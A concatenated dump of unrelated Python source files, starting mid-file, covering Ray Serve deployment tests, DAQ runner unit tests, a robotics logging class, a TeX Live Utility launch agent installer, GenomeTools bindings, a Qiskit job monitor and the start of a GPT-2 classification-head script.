self.count += 1
return {"count": self.count}
serve.start()
Counter.deploy()
assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 1}
assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 2}
assert ray.get(Counter.get_handle().remote()) == {"count": 3}
def test_deploy_async_class_no_params(serve_instance):
@serve.deployment
class AsyncCounter:
async def __init__(self):
await asyncio.sleep(5)
self.count = 0
async def __call__(self):
self.count += 1
await asyncio.sleep(5)
return {"count": self.count}
serve.start()
AsyncCounter.deploy()
assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 1}
assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 2}
assert ray.get(AsyncCounter.get_handle().remote()) == {"count": 3}
def test_user_config(serve_instance):
@serve.deployment("counter", num_replicas=2, user_config={"count": 123, "b": 2})
class Counter:
def __init__(self):
self.count = 10
def __call__(self, *args):
return self.count, os.getpid()
def reconfigure(self, config):
self.count = config["count"]
Counter.deploy()
handle = Counter.get_handle()
def check(val, num_replicas):
pids_seen = set()
for i in range(100):
result = ray.get(handle.remote())
if str(result[0]) != val:
return False
pids_seen.add(result[1])
return len(pids_seen) == num_replicas
wait_for_condition(lambda: check("123", 2))
Counter = Counter.options(num_replicas=3)
Counter.deploy()
wait_for_condition(lambda: check("123", 3))
Counter = Counter.options(user_config={"count": 456})
Counter.deploy()
wait_for_condition(lambda: check("456", 3))
def test_reject_duplicate_route(serve_instance):
@serve.deployment(name="A", route_prefix="/api")
class A:
pass
A.deploy()
with pytest.raises(ValueError):
A.options(name="B").deploy()
def test_scaling_replicas(serve_instance):
@serve.deployment(name="counter", num_replicas=2)
class Counter:
def __init__(self):
self.count = 0
def __call__(self, _):
self.count += 1
return self.count
Counter.deploy()
counter_result = []
for _ in range(10):
resp = requests.get("http://127.0.0.1:8000/counter").json()
counter_result.append(resp)
# If the load is shared among two replicas. The max result cannot be 10.
assert max(counter_result) < 10
Counter.options(num_replicas=1).deploy()
counter_result = []
for _ in range(10):
resp = requests.get("http://127.0.0.1:8000/counter").json()
counter_result.append(resp)
# Give some time for a replica to spin down. But majority of the request
# should be served by the only remaining replica.
assert max(counter_result) - min(counter_result) > 6
def test_delete_deployment(serve_instance):
@serve.deployment(name="delete")
def function(_):
return "hello"
function.deploy()
assert requests.get("http://127.0.0.1:8000/delete").text == "hello"
function.delete()
@serve.deployment(name="delete")
def function2(_):
return "olleh"
function2.deploy()
for _ in range(10):
try:
assert requests.get("http://127.0.0.1:8000/delete").text == "olleh"
break
except AssertionError:
time.sleep(0.5) # Wait for the change to propagate.
else:
assert requests.get("http://127.0.0.1:8000/delete").text == "olleh"
def test_starlette_request(serve_instance):
@serve.deployment(name="api")
async def echo_body(starlette_request):
data = await starlette_request.body()
return data
echo_body.deploy()
# Long string to test serialization of multiple messages.
UVICORN_HIGH_WATER_MARK = 65536 # max bytes in one message
long_string = "x" * 10 * UVICORN_HIGH_WATER_MARK
resp = requests.post("http://127.0.0.1:8000/api", data=long_string).text
assert resp == long_string
def test_start_idempotent(serve_instance):
@serve.deployment(name="start")
def func(*args):
pass
func.deploy()
assert "start" in serve.list_deployments()
serve.start(detached=True)
serve.start()
serve.start(detached=True)
serve.start()
assert "start" in serve.list_deployments()
def test_shutdown_destructor(serve_instance):
signal = SignalActor.remote()
@serve.deployment
class A:
def __del__(self):
signal.send.remote()
A.deploy()
A.delete()
ray.get(signal.wait.remote(), timeout=10)
# If the destructor errored, it should be logged but also cleaned up.
@serve.deployment
class B:
def __del__(self):
raise RuntimeError("Opps")
B.deploy()
B.delete()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
|
py | 1a3f846da97e05ca19c2abc542f6bea97ff8b465 | """Unit tests for configurator"""
import unittest
import sys
import os
import time
from unittest.mock import MagicMock, mock_open, patch
from forch.proto.shared_constants_pb2 import PortBehavior
from forch.proto.devices_state_pb2 import DevicePortEvent
from daq.runner import DAQRunner, configurator, PortInfo
from daq.host import ConnectedHost
import network
import logging
logger = logging.getLogger()
logger.level = logging.INFO
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
class TestRunner(unittest.TestCase):
"""Test class for Configurator"""
config = {
'monitor_scan_sec' : '30',
'default_timeout_sec' : '350',
'base_conf' : 'resources/setups/baseline/base_config.json',
'site_path' : 'local/site/',
'initial_dhcp_lease_time' : '120s',
'dhcp_lease_time' : '500s',
'long_dhcp_response_sec' : '105'
}
def setUp(self):
os.environ = {
**os.environ,
"DAQ_VERSION": "",
"DAQ_LSB_RELEASE": "",
"DAQ_SYS_UNAME": ""
}
configurator.Configurator.load_and_merge = MagicMock(return_value={})
network.TestNetwork.__init__ = MagicMock(return_value=None)
DAQRunner._get_test_metadata = MagicMock(return_value={})
with patch("builtins.open", mock_open(read_data="a: b")):
self.runner = DAQRunner(self.config)
def test_reap_stale_ports(self):
"""Test port flap timeout config override"""
self.runner.target_set_error = MagicMock()
device = self.runner._devices.new_device("0000000000", None)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
ConnectedHost.__init__ = MagicMock(return_value=None)
host = ConnectedHost()
host.test_name = "test_test"
device.port.flapping_start = time.time() - 1
device.host = host
host.get_port_flap_timeout = MagicMock(return_value=10000)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
host.get_port_flap_timeout = MagicMock(return_value=None)
self.runner._reap_stale_ports()
host.get_port_flap_timeout.assert_called_with(host.test_name)
self.runner.target_set_error.assert_called()
def test_reap_stale_ports_with_remote_ports(self):
"""Test device learn on vlan trigger"""
self.runner.target_set_error = MagicMock()
device = self.runner._devices.new_device("0000000000", None)
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down)
self.runner._handle_remote_port_state(device, mock_port_event)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
ConnectedHost.__init__ = MagicMock(return_value=None)
host = ConnectedHost()
host.test_name = "test_test"
device.host = host
host.get_port_flap_timeout = MagicMock(return_value=10000)
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.up)
self.runner._handle_remote_port_state(device, mock_port_event)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
host.get_port_flap_timeout = MagicMock(return_value=None)
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down)
self.runner._handle_remote_port_state(device, mock_port_event)
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.up)
self.runner._handle_remote_port_state(device, mock_port_event)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down)
self.runner._handle_remote_port_state(device, mock_port_event)
self.runner._reap_stale_ports()
host.get_port_flap_timeout.assert_called_with(host.test_name)
self.runner.target_set_error.assert_called()
if __name__ == '__main__':
unittest.main()
|
py | 1a3f84b9501ecc7ef1b85c932c96d89b8a2e45db | #!/usr/bin/env python3
# IMPORTS
# system
import sys, time
from copy import copy
from collections import defaultdict
import pdb
# math
import numpy as np
from scipy.spatial.transform import Rotation as R
# ros
from utils import *
class RaptorLogger:
"""
This helper class writes to /reads from log files.
* save_elms is a class var that defines what variables will be in the log files. There are different ones for estimation, ground truth, ssp, and params
* to write, the user will pass in an object name and a dict with keys corresponding to the second element of each tuple in save_elms
* to read the user gives the object name, and a dict is passed back
* params are treated slightly differently, with their own read/write functions
"""
def __init__(self, mode="write", names=None, base_path="./", b_ssp=False):
self.names = names
self.base_path = base_path
self.b_ssp = b_ssp
self.save_elms = {}
self.log_data = defaultdict(dict)
self.fh = None
self.fn = None
self.prm_fn = self.base_path + '_prms.log'
self.save_elms['est'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int))
('Ado State Est', 'state_est', 13),
('Ego State Est', 'ego_state_est', 13),
('3D Corner Est (X|Y|Z)', 'corners_3d_est', 8*3),
('Corner 2D Projections Est (r|c)', 'proj_corners_est', 8*2),
('Angled BB (r|c|w|h|ang_deg)', 'abb', 5),
('Image Segmentation Mode', 'im_seg_mode', 1)]
self.save_elms['gt'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int))
('Ado State GT', 'state_gt', 13),
('Ego State GT', 'ego_state_gt', 13),
('3D Corner GT (X|Y|Z)', 'corners_3d_gt', 8*3),
('Corner 2D Projections GT (r|c)', 'proj_corners_gt', 8*2),
('Angled BB (r|c|w|h|ang_deg)', 'abb', 5),
('Image Segmentation Mode', 'im_seg_mode', 1)]
self.save_elms['ssp'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int))
('Ado State GT', 'state_gt', 13),
('Ado State Est', 'state_est', 13),
('Ego State Est', 'ego_state_est', 13),
('Ego State GT', 'ego_state_gt', 13),
('3D Corner Est (X|Y|Z)', 'corners_3d_gt', 8*3),
('3D Corner GT (X|Y|Z)', 'corners_3d_gt', 8*3),
('Corner 2D Projections Est (r|c)', 'proj_corners_est', 8*2),
('Corner 2D Projections GT (r|c)', 'proj_corners_gt', 8*2)]
if not b_ssp:
self.modes = ['est', 'gt']
else:
self.modes = ['ssp']
if mode=="read":
self.init_read()
elif mode=="write":
if names is None:
raise RuntimeError("Must provide list of names for tracked object")
self.init_write()
else:
raise RuntimeError("Unrecognized logging mode")
def init_write(self):
all_name_str = ''
for n in self.names:
all_name_str += (n + ' ')
all_name_str = all_name_str[:-1]
self.save_elms['prms'] = [('Camera Intrinsics (K)', 'K', 4),
('tf_cam_ego', 'tf_cam_ego', 16),
('Object BB Size (len|wid|hei|diam) [{}]'.format(all_name_str), '3d_bb_dims', 4*len(self.names))]
# create files and write headers
self.fh = defaultdict(dict)
for m in self.modes:
for n in self.names:
# Create logs
fn = self.base_path + '_' + n + '_'+ m + '.log'
self.create_file_dir(fn)
self.fh[m][n] = open(fn,'w+') # doing this here makes it appendable
save_el_shape = (len(self.save_elms[m]), len(self.save_elms[m][0]))
data_header = ", ".join(np.reshape([*zip(self.save_elms[m])], save_el_shape)[:,0].tolist())
np.savetxt(self.fh[m][n], X=[], header=data_header) # write header
def init_read(self):
self.save_elms['prms'] = [('Camera Intrinsics (K)', 'K', 4),
('tf_cam_ego', 'tf_cam_ego', 16),
('Object BB Size (len|wid|hei|diam) []', '3d_bb_dims', -1)]
self.read_params()
self.fn = defaultdict(dict)
for m in self.modes:
for n in self.names:
self.fn[m][n] = self.base_path + '_' + n + '_'+ m + '.log'
def write_params(self, param_data, mode='prms'):
# write header
self.create_file_dir(self.prm_fn)
prm_fh = open(self.prm_fn,'w+') # doing this here makes it appendable
save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0]))
data_header = ", ".join(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,0].tolist())
np.savetxt(prm_fh, X=[], header=data_header) # write header
# write body
save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0]))
num_to_write = np.sum(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,2].astype(int))
out = np.ones((1, num_to_write)) * 1e10
ind = 0
for i, (header_str, dict_str, count) in enumerate(self.save_elms[mode]):
if dict_str in param_data:
try:
out[0, ind:(ind + count)] = param_data[dict_str]
except:
print("issue with {}".format(dict_str))
pdb.set_trace()
ind += count
out[out>1e5] = np.nan
np.savetxt(prm_fh, X=out, fmt='%.6f') # write to file
prm_fh.close()
def read_params(self, log_type='prms'):
# get header
f = open(self.prm_fn)
header_str = f.readline()
self.log_data[log_type]['ado_names'] = header_str.split('[')[1].split(']')[0].split(' ')
self.names = self.log_data[log_type]['ado_names']
# Read rest of file
data = np.loadtxt(self.prm_fn)
f.close()
ind = 0
for i, (header_str, dict_str, count) in enumerate(self.save_elms[log_type]):
if len(data.shape) > 1:
self.log_data[log_type][dict_str] = data[:, ind:(ind + count)]
else:
self.log_data[log_type][dict_str] = data[ind:(ind + count)]
ind += count
if dict_str == 'K': # Turn camera intrinsics back into a matrix
K = np.eye(3)
K[0, 0] = self.log_data[log_type][dict_str][0]
K[1, 1] = self.log_data[log_type][dict_str][1]
K[0, 2] = self.log_data[log_type][dict_str][2]
K[1, 2] = self.log_data[log_type][dict_str][3]
self.log_data[log_type][dict_str] = K
elif dict_str == 'tf_cam_ego':
self.log_data[log_type][dict_str] = np.reshape(self.log_data[log_type][dict_str], (4, 4))
elif dict_str == '3d_bb_dims':
all_sizes = np.asarray(data[ind : ind + 4*len(self.log_data[log_type]['ado_names'])])
bb_3d_dict_all = {}
for k, name in enumerate(self.log_data[log_type]['ado_names']):
bb_3d_dict_all[name] = all_sizes[4*k : 4*k+4] # len|wid|hei|diam
self.log_data[log_type][dict_str] = bb_3d_dict_all
return self.log_data[log_type]
def write_data_to_log(self, data, name, mode):
""" mode can be est, gt, ssp"""
        if (not self.b_ssp and mode not in ['est', 'gt']) or (self.b_ssp and mode != 'ssp'):
raise RuntimeError("Mode {} not recognized".format(mode))
save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0]))
num_to_write = np.sum(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,2].astype(int))
out = np.ones((1, num_to_write)) * 1e10
ind = 0
for i, (header_str, dict_str, count) in enumerate(self.save_elms[mode]):
if dict_str in data:
try:
out[0, ind:(ind + count)] = data[dict_str]
except:
print("issue with {}".format(dict_str))
pdb.set_trace()
ind += count
out[out>1e5] = np.nan
np.savetxt(self.fh[mode][name], X=out, fmt='%.6f') # write to file
def read_logs(self, name):
"""
Return a dict with keys being log type (est /gt /prms). Each of these is a dict with the various types of values in the log
"""
        if self.names is None:
            self.read_params()  # the params log supplies the ado names needed below
for log_type in self.fn:
            if log_type not in self.save_elms:
                print("Warning: we are missing the log file for {}".format(log_type))
continue
ind = 0
data = np.loadtxt(self.fn[log_type][name])
for i, (header_str, dict_str, count) in enumerate(self.save_elms[log_type]):
if len(data.shape) > 1:
self.log_data[log_type][dict_str] = data[:, ind:(ind + count)]
else:
self.log_data[log_type][dict_str] = data[ind:(ind + count)]
ind += count
return self.log_data
def close_files(self):
for fh_key in self.fh:
if fh_key == 'prms':
self.fh[fh_key].close()
continue
for n in self.names:
self.fh[fh_key][n].close()
def create_file_dir(self, fn_with_dir):
path = "/".join(fn_with_dir.split("/")[:-1])
if not os.path.exists( path ):
os.makedirs( path )
|
py | 1a3f84f7581414e7d676e1866622ffaa8bc03e29 | #!/usr/bin/env python
#
# This software is Copyright (c) 2010-2016
# Adam Maxwell. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# - Neither the name of Adam Maxwell nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from optparse import OptionParser
import os
import sys
from subprocess import call as sync_task
from shutil import copy2 as copyfile
import plistlib
LAUNCHCTL_PATH = "/bin/launchctl"
SCRIPT_NAME = "texliveupdatecheck"
PLIST_NAME = "com.googlecode.mactlmgr.update_check.plist"
def log_message(msg):
"""write a message to standard output"""
sys.stderr.write("%s: %s\n" % (os.path.basename(sys.argv[0]), msg))
def installed_plist_path():
"""absolute path to the installed plist for the process owner"""
plist_dir = "/Library/LaunchAgents" if os.geteuid() == 0 else os.path.expanduser("~/Library/LaunchAgents")
return os.path.join(plist_dir, PLIST_NAME)
def installed_script_path():
"""absolute path to the installed script for the process owner"""
script_dir = "/Library/Application Support/TeX Live Utility"
if os.geteuid() != 0:
script_dir = os.path.expanduser("~" + script_dir)
return os.path.join(script_dir, SCRIPT_NAME)
def unload_agent():
"""returns zero in case of success or if the plist does not exist"""
plist_path = installed_plist_path()
ret = 0
if os.path.exists(plist_path):
ret = sync_task([LAUNCHCTL_PATH, "unload", "-w", "-S", "Aqua", plist_path])
else:
log_message("nothing to unload")
if ret:
log_message("unable to unload agent %s" % (plist_path))
return ret
def load_agent():
"""returns zero if the plist was loaded, raises if it does not exist"""
plist_path = installed_plist_path()
assert os.path.exists(plist_path), "%s does not exist" % (plist_path)
ret = sync_task([LAUNCHCTL_PATH, "load", "-w", "-S", "Aqua", plist_path])
if ret:
log_message("unable to load agent %s" % (plist_path))
return ret
def uninstall_agent():
"""returns nonzero if the plist exists and could not be unloaded"""
plist_path = installed_plist_path()
ret = 0
# nonexistence is not a failure
if os.path.exists(plist_path):
try:
os.remove(plist_path)
except Exception as e:
log_message("ERROR: failed to remove %s" % (plist_path))
ret = 1
else:
log_message("nothing to remove")
return ret
def sync_agent_program_name():
"""ensure the launch agent plist has the current program name"""
plist_path = installed_plist_path()
exec_path = installed_script_path()
# mainly for the change from Python update checker to Obj-C
if os.path.exists(plist_path) and os.path.exists(exec_path):
unload_agent()
try:
# Now edit the plist in-memory so it points to the correct path,
# then save it out to the destination directory (avoids modifying
# the passed-in file).
with open(plist_path, "rb") as plfile:
plist = plistlib.load(plfile)
# rewrite entire array
plist["ProgramArguments"] = [exec_path]
with open(plist_path, "wb") as plfile:
plistlib.dump(plist, plfile, fmt=plistlib.FMT_XML)
except Exception as e:
log_message("ERROR: failed to regenerate launchd plist %s with exception %s" % (plist_path, e))
else:
load_agent()
def install_agent(source_path):
"""argument is absolute path to the source property list"""
plist_path = installed_plist_path()
plist_dir = os.path.dirname(plist_path)
ret = 0
if os.path.exists(plist_dir) == False:
try:
os.makedirs(plist_dir)
except Exception as e:
log_message("ERROR: failed to create %s" % (plist_dir))
ret = 1
if ret == 0:
assert os.path.isdir(plist_dir), "%s is not a directory" % (plist_dir)
try:
# Now edit the plist in-memory so it points to the correct path,
# then save it out to the destination directory (avoids modifying
# the passed-in file).
with open(source_path, "rb") as plfile:
plist = plistlib.load(plfile)
# rewrite entire array
plist["ProgramArguments"] = [installed_script_path()]
with open(plist_path, "wb") as plfile:
plistlib.dump(plist, plfile, fmt=plistlib.FMT_XML)
except Exception as e:
log_message("ERROR: failed to copy %s --> %s" % (source_path, plist_path))
ret = 1
return ret
def install_script(source_path):
"""argument is absolute path to the source script"""
script_path = installed_script_path()
script_dir = os.path.dirname(script_path)
ret = 0
if os.path.exists(script_dir) == False:
try:
os.makedirs(script_dir)
except Exception as e:
log_message("ERROR: failed to create %s" % (script_dir))
ret = 1
if ret == 0:
assert os.path.isdir(script_dir), "%s is not a directory" % (script_dir)
try:
copyfile(source_path, script_path)
except Exception as e:
log_message("ERROR: failed to copy %s --> %s" % (source_path, script_path))
ret = 1
return ret
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-i", "--install", help="install agent", action="store_true", dest="install", default=False)
parser.add_option("-r", "--remove", help="remove agent", action="store_true", dest="remove", default=False)
parser.add_option("-p", "--plist", help="path of property list to install", action="store", type="string", dest="source_plist")
parser.add_option("-s", "--script", help="path of script to install", action="store", type="string", dest="source_script")
(options, args) = parser.parse_args()
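    # Usage sketch (the script filename below is a placeholder, not taken from the
    # original source); the two supported modes of this installer are:
    #   python agent_installer.py -i -p /path/to/com.googlecode.mactlmgr.update_check.plist -s /path/to/texliveupdatecheck
    #   python agent_installer.py -r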
if options.install == options.remove:
if options.install == False:
parser.error("an action (install or remove) must be specified")
else:
parser.error("only one action may be specified")
if options.install:
if options.source_plist is None and options.source_script is None:
parser.error("at least one of option -p or -s is required")
# if os.path.isabs(options.source_plist) == False or os.path.isabs(options.source_script) == False:
# parser.error("path arguments must be absolute")
if options.source_plist and not os.path.isfile(options.source_plist):
parser.error("path arguments cannot point to a directory")
assert os.path.basename(options.source_plist) == PLIST_NAME, "incorrect plist name defined"
if options.source_script and not os.path.isfile(options.source_script):
parser.error("path arguments cannot point to a directory")
assert os.path.basename(options.source_script) == SCRIPT_NAME, "incorrect script name defined"
status = 0
if options.remove:
status += unload_agent()
status += uninstall_agent()
else:
assert options.install, "inconsistent option checking"
# unload a previous version before installing
if options.source_plist:
status += unload_agent()
if options.source_script:
status += install_script(options.source_script)
# if unloaded and we have a plist, now try to install and load it
if status == 0 and options.source_plist:
status = install_agent(options.source_plist)
if status == 0:
status = load_agent()
# in case the name of the script has changed; will also unload/reload
if 0 == status:
sync_agent_program_name()
exit(status)
|
py | 1a3f851cd15ad627a0fbbb015e21d699cb93df63 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 Daniel Standage <[email protected]>
# Copyright (c) 2008 Sascha Steinbiss <[email protected]>
# Copyright (c) 2008 Center for Bioinformatics, University of Hamburg
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from gt.dlload import gtlib
from gt.annotationsketch.rec_map import RecMap
import math
def cmp_to_key(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj, *args):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) < 0
def __gt__(self, other):
return mycmp(self.obj, other.obj) > 0
def __eq__(self, other):
return mycmp(self.obj, other.obj) == 0
def __le__(self, other):
return mycmp(self.obj, other.obj) <= 0
def __ge__(self, other):
return mycmp(self.obj, other.obj) >= 0
def __ne__(self, other):
return mycmp(self.obj, other.obj) != 0
return K
class ImageInfo:
def __init__(self):
self.ii = gtlib.gt_image_info_new()
self._as_parameter_ = self.ii
self.hotspots = None
def __del__(self):
try:
gtlib.gt_image_info_delete(self.ii)
except AttributeError:
pass
def from_param(cls, obj):
if not (isinstance(obj, ImageInfo) or obj == None):
raise TypeError("argument must be an ImageInfo")
if obj == None:
return None
return obj._as_parameter_
from_param = classmethod(from_param)
def get_height(self):
return gtlib.gt_image_info_get_height(self.ii)
def num_of_rec_maps(self):
return gtlib.gt_image_info_num_of_rec_maps(self.ii)
def compare_hotspots(cls, hs1, hs2):
if hs1[2] - hs1[0] + 1 > hs2[2] - hs2[0] + 1:
return 1
elif hs1[2] - hs1[0] + 1 == hs2[2] - hs2[0] + 1:
if hs1[3] > hs2[3]:
return 1
elif hs1[3] == hs2[3]:
return 0
else:
return -1
else:
return -1
compare_hotspots = classmethod(compare_hotspots)
def each_hotspot(self):
if not self.hotspots:
self.hotspots = []
for i in range(self.num_of_rec_maps()):
rm = RecMap(gtlib.gt_image_info_get_rec_map(self.ii, i))
self.hotspots.append([math.floor(rm.get_northwest_x()),
math.floor(rm.get_northwest_y()),
math.floor(rm.get_southeast_x()),
math.floor(rm.get_southeast_y()),
rm.get_genome_feature()])
self.hotspots.sort(key=cmp_to_key(ImageInfo.compare_hotspots))
for hs in self.hotspots:
yield (hs[0], hs[1], hs[2], hs[3], hs[4])
def register(cls, gtlib):
from ctypes import c_void_p, c_ulong, c_uint
gtlib.gt_image_info_delete.restype = None
gtlib.gt_image_info_delete.argtypes = [c_void_p]
gtlib.gt_image_info_get_rec_map.restype = c_void_p
gtlib.gt_image_info_get_rec_map.argtypes = [c_void_p, c_ulong]
gtlib.gt_image_info_num_of_rec_maps.restype = c_ulong
gtlib.gt_image_info_num_of_rec_maps.argtypes = [c_void_p]
gtlib.gt_image_info_get_height.restype = c_uint
gtlib.gt_image_info_get_height.argtypes = [c_void_p]
gtlib.gt_image_info_new.restype = c_void_p
gtlib.gt_image_info_new.argtypes = []
register = classmethod(register)
|
py | 1a3f85bbedeed244c772f25976b32a12411e0eba | # This problem was asked by Facebook.
#
# Given the mapping a = 1, b = 2, ... z = 26, and an encoded message, count the number of ways it can be decoded.
#
# For example, the message '111' would give 3, since it could be decoded as 'aaa', 'ka', and 'ak'.
#
# You can assume that the messages are decodable. For example, '001' is not allowed.
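# One possible solution sketch (not part of the original prompt): O(n) dynamic
# programming where `prev`/`curr` hold the decode counts for the prefixes ending
# one and zero characters back.
def num_decodings(message):
    if not message or message[0] == '0':
        return 0
    prev, curr = 1, 1  # counts for prefixes of length i-1 and i
    for i in range(1, len(message)):
        nxt = curr if message[i] != '0' else 0        # decode message[i] alone (1-9)
        if 10 <= int(message[i - 1:i + 1]) <= 26:     # decode the two-digit pair (10-26)
            nxt += prev
        prev, curr = curr, nxt
    return curr
assert num_decodings('111') == 3  # 'aaa', 'ka', 'ak'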
|
py | 1a3f8667207df54e760f93b967c9c212d1a0e9ac | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""A module for monitoring various qiskit functionality"""
import sys
import time
def _text_checker(job, interval, _interval_set=False, quiet=False, output=sys.stdout):
"""A text-based job status checker
Args:
job (BaseJob): The job to check.
interval (int): The interval at which to check.
_interval_set (bool): Was interval time set by user?
quiet (bool): If True, do not print status messages.
output (file): The file like object to write status messages to.
By default this is sys.stdout.
"""
status = job.status()
msg = status.value
prev_msg = msg
msg_len = len(msg)
if not quiet:
print('\r%s: %s' % ('Job Status', msg), end='', file=output)
while status.name not in ['DONE', 'CANCELLED', 'ERROR']:
time.sleep(interval)
status = job.status()
msg = status.value
if status.name == 'QUEUED':
msg += ' (%s)' % job.queue_position()
if job.queue_position() is None:
interval = 2
elif not _interval_set:
interval = max(job.queue_position(), 2)
else:
if not _interval_set:
interval = 2
# Adjust length of message so there are no artifacts
if len(msg) < msg_len:
msg += ' ' * (msg_len - len(msg))
elif len(msg) > msg_len:
msg_len = len(msg)
if msg != prev_msg and not quiet:
print('\r%s: %s' % ('Job Status', msg), end='', file=output)
prev_msg = msg
if not quiet:
print('', file=output)
def job_monitor(job, interval=None, quiet=False, output=sys.stdout):
"""Monitor the status of a IBMQJob instance.
Args:
job (BaseJob): Job to monitor.
interval (int): Time interval between status queries.
quiet (bool): If True, do not print status messages.
output (file): The file like object to write status messages to.
By default this is sys.stdout.
"""
if interval is None:
_interval_set = False
interval = 5
else:
_interval_set = True
_text_checker(job, interval, _interval_set,
quiet=quiet, output=output)
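# Usage sketch (assumes a job already submitted to a backend, e.g. via
# qiskit.execute; the names below are illustrative only):
#   job = execute(circuit, backend)
#   job_monitor(job, interval=2)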
|
py | 1a3f86b61381e0998c5cf08122cf44c91473a22d | #! /usr/bin/env python3
# coding=utf-8
# This code is licensed under a non-commercial license.
import os
import sys
import argparse
from tqdm import trange
from torchtext import data as torchtext_data
from torchtext import datasets
import torch
import torch.utils.data as data
from torchtext.vocab import Vectors, GloVe, CharNGram, FastText
from nltk.tokenize.treebank import TreebankWordDetokenizer
import torch
import torch.optim
import torch.nn.functional as F
import numpy as np
from IPython import embed
from operator import add
from run_gpt2 import top_k_logits
from style_utils import to_var
import copy
import pickle
from torch.utils.data import DataLoader
from torch.utils.data.dataset import random_split
import torch.optim as optim
torch.manual_seed(0)
np.random.seed(0)
lab_root = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', '..')
sys.path.insert(1, lab_root)
from pytorch_pretrained_bert import GPT2LMHeadModel, GPT2Tokenizer
from torch.autograd import Variable
tokenizer = GPT2Tokenizer.from_pretrained('/content/drive/MyDrive/passage_generation_testing/gpt2-medium')
model = GPT2LMHeadModel.from_pretrained('/content/drive/MyDrive/passage_generation_testing/gpt2-medium')
class ClassificationHead(torch.nn.Module):
""" Language Model Head for the transformer """
def __init__(self, class_size=5, embed_size=2048):
super(ClassificationHead, self).__init__()
self.class_size = class_size
self.embed_size = embed_size
# self.mlp1 = torch.nn.Linear(embed_size, embed_size)
# self.mlp2 = (torch.nn.Linear(embed_size, class_size))
self.mlp = (torch.nn.Linear(embed_size, class_size))
def forward(self, hidden_state):
# Truncated Language modeling logits (we remove the last token)
# h_trunc = h[:, :-1].contiguous().view(-1, self.n_embd)
# lm_logits = F.relu(self.mlp1(hidden_state))
# lm_logits = self.mlp2(lm_logits)
lm_logits = self.mlp(hidden_state)
return lm_logits
